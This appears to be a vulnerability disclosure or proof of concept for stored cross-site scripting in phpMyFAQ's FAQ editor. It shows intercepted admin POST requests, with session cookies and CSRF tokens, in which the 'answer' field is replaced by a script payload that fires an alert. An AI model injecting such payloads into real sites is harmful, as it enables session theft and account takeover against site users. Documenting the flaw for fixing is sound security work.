Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Step 1: Go to Add New FAQ
Step 2: Add a FAQ
Step 3: Intercept the request
POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 386
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1
revision_id=0&record_id=8&openQuestionId=0¬ifyUser=¬ifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=%3Cp%3Etest%3C%2Fp%3E&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=¬es=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007
We can see this answer parameter -> answer=%3Cp%3Etest%3C%2Fp%3E
change the value of the answer parameter to <script>alert(document.domain)</script>
POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 404
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1
revision_id=0&record_id=8&openQuestionId=0¬ifyUser=¬ifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=<script>alert(document.domain)</script>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=¬es=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007
Step 4: Forward the FAQ request
Step 5: Go to the FAQ page
Step 6: XSS Triggered!